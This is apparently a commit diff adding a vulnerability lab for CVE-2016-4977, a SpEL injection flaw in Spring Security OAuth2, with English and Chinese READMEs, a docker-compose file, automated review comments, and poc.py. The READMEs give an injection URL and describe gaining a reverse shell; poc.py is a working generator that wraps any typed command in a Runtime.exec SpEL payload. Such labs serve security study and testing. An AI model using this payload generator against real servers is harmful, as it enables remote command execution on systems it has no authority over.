first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled

This commit is contained in:
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions

BIN
spring/CVE-2016-4977/1.png Normal file

Binary file not shown. Size: 17 KiB

BIN
spring/CVE-2016-4977/2.png Normal file

Binary file not shown. Size: 65 KiB

BIN
spring/CVE-2016-4977/3.png Normal file

Binary file not shown. Size: 16 KiB

View File

@@ -0,0 +1,39 @@
# Spring Security OAuth2 Remote Command Execution Vulnerability (CVE-2016-4977)
[中文版本(Chinese version)](README.zh-cn.md)
Spring Security OAuth provides support for using Spring Security with OAuth (1a) and OAuth2 using standard Spring and Spring Security programming models and configuration idioms.
In its use of whitelabel views for error handling, an remote attacker can execute commands by constructing malicious parameters through the Springs Expression Language (SpEL).
Reference links.
- http://secalert.net/#CVE-2016-4977
- https://deadpool.sh/2017/RCE-Springs/
- http://blog.knownsec.com/2016/10/spring-security-oauth-rce/
## Vulnerability environment
Execute the following command to start a Spring Security OAuth application.
```
docker compose up -d
```
After the server is started, browse the ``http://your-ip:8080/`` to see its home page.
## Exploit
Request to the `http://your-ip:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test`, first you need to fill in the username and password, we just fill in `admin:admin` here.
As you can see, SpEL expression `${233*233}` has been successfully executed and returned the result.
![](1.png)
We then use [poc.py](poc.py) to generate an EXP for the [reverse shell](http://www.jackson-t.ca/runtime-exec-payloads.html):
![](2.png)
As above, a long SpEL expression exploit is generated. Send the request with this SpEL exploit, a reverse shell is gained:
![](3.png)
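Review bot: The English description drops the precondition the Chinese version states (攻击者在被授权的情况下, i.e. the attacker must be authenticated, which is also why the Exploit section has the reader log in as admin:admin first); suggest "an authenticated remote attacker can execute commands" so the two READMEs agree on the attack prerequisite. Also in that sentence "an remote attacker" should be "a remote attacker" and "Springs Expression Language" should be "Spring Expression Language", and "Reference links." should end with a colon to match the Chinese 参考链接:.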

View File

@@ -0,0 +1,35 @@
# Spring Security OAuth2 远程命令执行漏洞CVE-2016-4977
Spring Security OAuth 是为 Spring 框架提供安全认证支持的一个模块。在其使用 whitelabel views 来处理错误时由于使用了Springs Expression Language (SpEL),攻击者在被授权的情况下可以通过构造恶意参数来远程执行命令。
参考链接:
- http://secalert.net/#CVE-2016-4977
- https://deadpool.sh/2017/RCE-Springs/
- http://blog.knownsec.com/2016/10/spring-security-oauth-rce/
## 运行环境
执行如下命令启动漏洞环境:
```
docker compose up -d
```
启动完成后,访问`http://your-ip:8080/`即可看到web页面。
## 漏洞复现
访问`http://your-ip:8080/oauth/authorize?response_type=${233*233}&client_id=acme&scope=openid&redirect_uri=http://test`。首先需要填写用户名和密码,我们这里填入`admin:admin`即可。
可见我们输入是SpEL表达式`${233*233}`已经成功执行并返回结果:
![](1.png)
然后,我们使用[poc.py](poc.py)来生成反弹shell的POC注意[Java反弹shell的限制与绕过方式](http://www.jackson-t.ca/runtime-exec-payloads.html)
![](2.png)
如上图生成了一大串SpEL语句。附带上这个SpEL语句访问成功弹回shell
![](3.png)
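Review bot: 可见我们输入是SpEL表达式 reads as a typo for 可见我们输入的SpEL表达式 (是 should be 的). Two lines also appear to have lost their separators: the heading 远程命令执行漏洞CVE-2016-4977 should carry the parentheses the English title has, 远程命令执行漏洞（CVE-2016-4977）, and 生成反弹shell的POC注意[...] needs punctuation before 注意, e.g. 的POC（注意[...]）, so the link reads as a parenthetical rather than running into the previous clause.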

View File

@@ -0,0 +1,6 @@
version: '2'
services:
spring:
image: vulhub/spring-security-oauth2:2.0.8
ports:
- "8080:8080"
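Review bot: The top-level `version: '2'` key is obsolete for the `docker compose` CLI both READMEs tell the reader to run (Compose V2 ignores it and prints a warning that the attribute is obsolete); suggest dropping that line. Pinning the image to vulhub/spring-security-oauth2:2.0.8 is correct since that is the affected version. As rendered here the keys `spring:`, `image:` and `ports:` sit flush-left; please confirm the committed file keeps the YAML nesting (`spring:` indented under `services:`, `image:`/`ports:` under `spring:`), because a flat file would not define a service.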

View File

@@ -0,0 +1,12 @@
#!/usr/bin/env python
message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
print(poc)
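Review bot: With the `#!/usr/bin/env python` shebang this script behaves differently depending on which interpreter `python` resolves to: under Python 2, `input()` evaluates the typed text as a Python expression, so a line such as `bash -i` raises a NameError instead of being encoded (Python 2 would need `raw_input()`), while under Python 3 it works as intended; suggest `#!/usr/bin/env python3` to pin the interpreter the script was written for. `message[0]` also raises an IndexError on an empty line, so a short guard (or taking the command from `sys.argv`) would be friendlier. Finally, the `poc +=` line belongs inside the `for` loop and must be indented in the committed file (it renders flush-left here).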